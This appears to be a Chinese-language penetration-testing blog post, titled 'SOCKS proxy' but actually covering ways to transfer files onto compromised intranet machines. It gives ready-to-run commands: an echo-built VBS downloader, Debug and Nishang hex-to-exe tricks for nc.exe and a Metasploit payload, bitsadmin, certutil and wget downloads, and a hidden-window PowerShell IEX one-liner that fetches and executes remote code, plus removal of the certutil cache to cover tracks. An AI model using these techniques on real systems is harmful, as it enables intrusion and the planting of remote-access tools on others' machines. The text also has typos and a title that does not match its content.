SOCKS代理

发表于 | 分类于 |

内网中的上传和下载

利用FTP协议上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ftp 【服务器的IP地址】
put 【本地的文件】


cd<目录名>:进入指定目录。
lcd<文件夹路径>:定位本地文件夹(上传文件的位置或者下载文件的本地位置)。
type:查看当前的传输方式(默认为ASCII码传输)。
ascil:设置传输方式为ASCII码传输(传输TXT等格式的文件)。
binary:设置传输方式为二进制传输(传输EXE文件,以及图片、视音频文件等)。
close:结束与服务器的FTP会话。
quit:结束与服务器的FTP会话并退出FTP环境。
put<文件名> [newnamel:上传。"newname"为保存时的新名字,若不指定将以原名保存。
send<文件名> [newname]:上传。"newname为保存时的新名字.若不指定将以原名保存。
get<文件名> [newname]:下载。newname为保存时的新名字,若不指定将以原名保存。
mget filename filename..]:.下载多个文件。mget 命令支持空格和“?”两个通配符,例如“mget.mp3”表示下载FTP服务器当前目录下所有扩展名为“mp3”的文件

利用VBS上传

1
2
3
4
5
6
7
8
9
10
11
12
13
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","ip/文件",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile " 下载到的位置",2 >>download.vbs
 
依次执行以上命令,会生成download.vbs,命令执行download.vbs,即可下载target.exe文件
Cscript download.vbs

利用Debug上传

DEBUG是一个DOS实用程序,是供程序员使用的程序调试工具,可以用它检查内存中任何地方的字节以及修改任何地方的字节。它可以用于逐指令执行某个程序以验证程序运行的正确性,也可以追踪执行过程、比较一个指令执行前后的值以及比较与移动内存中数据的范围,读写文件与磁盘扇区。

我们利用Debug向目标主机上传文件的原理就是,先将需要上传的exe文件转换为十六进制hex的格式,将hex的内容复制,再通过echo命令将hex内容写入到目标主机上的一个文件中,最后利用debug将hex内容编译成exe文件。

1
wine exe2bat.exe nc.exe nc.txt

利用Nishang上传

Download Excule是Nishang中的下载执行脚本,常用于下载文本文件并将其转换为EXE文件。使用Nishang上传文件的原理是:利用Nishang将上传的EXE文件转换为十六进制的形式,然后使用echo命令访问目标服务器,最后使用Download Exccute脚本下载文本文件并将其转换为EXE文件。
在这里,需要使用echo命令将Nishang PowersShell脚本的内容上传到目标服务器中,并将执行以下命令,利用Nishang中的exetolext.psl脚本将由Metasploit生成的msf.exe修改为文本文件msf.txt

1
.\ ExetoText c: msf.exe c: msf.txt

接着,通过echo命令,先将转换的HEX值添加到目标文件中,再将Nishang脚本文件的内容添加到目标文件中。最,输人如下命令,调用Dowlad Excule脚本下载并执行该文本文件。

1
Download_Execute http://192.168.0.11/msf.txt

使用bitsadmin 进行下载

1
下载命令:bitsadmin /transfer n http://172.16.12.128/NC.exe E:\nc.exe

使用powershell 进行下载

1
2
本地下载:powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.12.128/NC.exe','nc.exe')
远程执行:powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://172.16.12.128/NC.exe'))"

使用 certutil 进行下载

1
2
3
下载文件:certutil -urlcache -split -f http://172.16.12.128/NC.exe
删除缓存:certutil -urlcache -split -f http://172.16.12.128/NC.exe delete
缓存目录:"%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content"

使用 WGET 进行下载

1
2
3
上传免安装的可执行程序wget.exe到目标机器,使用wget下载文件。
wget.exe下载:https://eternallybored.org/misc/wget/
下载命令:wget.exe -O "nc.exe" http://172.16.12.128/NC.exe
0%